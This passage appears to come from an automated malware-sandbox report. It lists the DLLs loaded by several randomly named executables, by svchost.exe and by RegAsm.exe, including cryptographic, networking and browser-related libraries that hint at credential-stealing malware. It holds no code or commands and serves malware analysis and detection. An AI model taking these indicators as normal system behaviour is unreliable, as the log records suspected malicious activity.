Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: shfolder.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: propsys.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: edputil.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: urlmon.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: iertutil.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: srvcli.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: netutils.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: sspicli.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: wintypes.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: appresolver.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: slc.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: userenv.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: sppc.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Section loaded: mscoree.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: esdsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: scrrun.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: linkinfo.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pcacli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
